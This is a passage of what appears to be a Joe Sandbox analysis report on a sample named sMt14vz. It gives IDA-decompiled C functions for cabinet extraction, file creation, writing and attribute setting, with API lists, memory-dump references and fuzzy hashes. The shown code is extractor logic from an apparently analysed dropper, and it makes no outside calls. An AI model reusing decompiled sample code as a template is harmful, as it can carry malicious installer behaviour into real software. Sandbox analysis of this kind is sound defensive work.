                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
                                                                                                                                                                                                                                            • Instruction ID: 50e989a5598fe0597fecb74f71280de1c131e51ff2b1aadb885ddb7a73b3cf3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F0907260020DBFABA4EFB8CC49DFB7BEDEB04240744466BE996C2450FA35D514C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				char* _t70;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				char* _t72;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E010D4E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E010D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t58 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t19 =  &(_t58[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t70 = _t19;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - _t70;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t22 = _t59 + 1; // 0x10d91e6
                                                                                                                                                                                                                                            						_t30 = _t22 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E010D476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E010D4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E010D47E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10d93f4 =  *0x10d93f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t63 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t6 =  &(_t63[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t72 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - _t72;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t9 = _t64 + 1; // 0x10d91e6
                                                                                                                                                                                                                                            						_t30 = _t9 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E010D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E010D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E010D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x010d4e20
                                                                                                                                                                                                                                            0x010d4e25
                                                                                                                                                                                                                                            0x010d4e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e33
                                                                                                                                                                                                                                            0x010d4e38
                                                                                                                                                                                                                                            0x010d4e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e40
                                                                                                                                                                                                                                            0x010d4e51
                                                                                                                                                                                                                                            0x010d4e56
                                                                                                                                                                                                                                            0x010d4e5b
                                                                                                                                                                                                                                            0x010d4e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e6a
                                                                                                                                                                                                                                            0x010d4e6f
                                                                                                                                                                                                                                            0x010d4e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e77
                                                                                                                                                                                                                                            0x010d4e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4e7d
                                                                                                                                                                                                                                            0x010d4d25
                                                                                                                                                                                                                                            0x010d4d25
                                                                                                                                                                                                                                            0x010d4d28
                                                                                                                                                                                                                                            0x010d4d36
                                                                                                                                                                                                                                            0x010d4d3b
                                                                                                                                                                                                                                            0x010d4d3d
                                                                                                                                                                                                                                            0x010d4d3d
                                                                                                                                                                                                                                            0x010d4d40
                                                                                                                                                                                                                                            0x010d4d40
                                                                                                                                                                                                                                            0x010d4d42
                                                                                                                                                                                                                                            0x010d4d43
                                                                                                                                                                                                                                            0x010d4d43
                                                                                                                                                                                                                                            0x010d4d47
                                                                                                                                                                                                                                            0x010d4d4a
                                                                                                                                                                                                                                            0x010d4d4a
                                                                                                                                                                                                                                            0x010d4d4c
                                                                                                                                                                                                                                            0x010d4d4f
                                                                                                                                                                                                                                            0x010d4d4f
                                                                                                                                                                                                                                            0x010d4d51
                                                                                                                                                                                                                                            0x010d4d52
                                                                                                                                                                                                                                            0x010d4d52
                                                                                                                                                                                                                                            0x010d4d56
                                                                                                                                                                                                                                            0x010d4d58
                                                                                                                                                                                                                                            0x010d4d5b
                                                                                                                                                                                                                                            0x010d4d5d
                                                                                                                                                                                                                                            0x010d4d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d67
                                                                                                                                                                                                                                            0x010d4d6f
                                                                                                                                                                                                                                            0x010d4d74
                                                                                                                                                                                                                                            0x010d4d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d7c
                                                                                                                                                                                                                                            0x010d4d84
                                                                                                                                                                                                                                            0x010d4d89
                                                                                                                                                                                                                                            0x010d4d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d94
                                                                                                                                                                                                                                            0x010d4d99
                                                                                                                                                                                                                                            0x010d4d9e
                                                                                                                                                                                                                                            0x010d4da1
                                                                                                                                                                                                                                            0x010d4daa
                                                                                                                                                                                                                                            0x010d4daa
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4da3
                                                                                                                                                                                                                                            0x010d4db5
                                                                                                                                                                                                                                            0x010d4dbb
                                                                                                                                                                                                                                            0x010d4dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4dc3
                                                                                                                                                                                                                                            0x010d4dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4dc5
                                                                                                                                                                                                                                            0x010d4dbd
                                                                                                                                                                                                                                            0x010d4d2a
                                                                                                                                                                                                                                            0x010d4d2a
                                                                                                                                                                                                                                            0x010d4d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4d2d
                                                                                                                                                                                                                                            0x010d4cf8
                                                                                                                                                                                                                                            0x010d4cfd
                                                                                                                                                                                                                                            0x010d4d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010D4DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010D4DDD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3625706803-0
                                                                                                                                                                                                                                            • Opcode ID: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
                                                                                                                                                                                                                                            • Instruction ID: c6ae06fcb67904e9d04faab1796e38211f83fd55ed02e3665786b2017fcf57b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3118342770bf3761b0fcf709a323f699fe69037d83ba523418c1652d30b96cf3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F4123362043029BDB71AF3CD9446F97BE5EF46300F0486A8D8C6D7E85DA32DA4ACB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010D4A23,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D48DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010D4F67,*MEMCAB,00008000,00000180), ref: 010D4902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
                                                                                                                                                                                                                                            • Instruction ID: d609f100cc4eca8ee585f41fe80697a6b182fcf272c3a6ae0f5bd5555c55229a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91300969b5619d2e7d325eaed0b17d3f8636a449393a1ec89512997725662c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27016DA3E126702AF36440398C89FFB955CCBD6675F1B0335BEEAE75C1D6644C0482E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x10d858c; // 0x268
                                                                                                                                                                                                                                            				_t9 = E010D3680(_t20);
                                                                                                                                                                                                                                            				if( *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x10d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t15 =  *0x10d9400 + _t25;
                                                                                                                                                                                                                                            							 *0x10d9400 = _t15;
                                                                                                                                                                                                                                            							if( *0x10d8184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10d93f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
                                                                                                                                                                                                                                              • Part of subcall function 010D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010D4B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
                                                                                                                                                                                                                                            • Instruction ID: c10e273a56c018d5a0e9bd05131aa6c34733e60e56259bc35ba949c5c2988281
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39df64131044268ffb71eb47369f3c4a8346e2d95286afa02b4a7e7a4057be7b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21018031201301ABD7248F68DC05FA67BA9FB58735F048266FEB9D75D4CB769811CB40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x10d8b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x10d8b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E010D16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D8B3E,010D8B3F,00000001,010D8B3E,-00000003,?,010D60EC,010D1140,?), ref: 010D65BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
                                                                                                                                                                                                                                            • Instruction ID: 05c6c2e5bd0fdf0831feaf7b3962c1efe9d3de5243aee7a7b13ad65ec416e423
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9c0fb66e33a3818e0b788dc009ab9c825aa53a774e9da4094595a2060724cc9
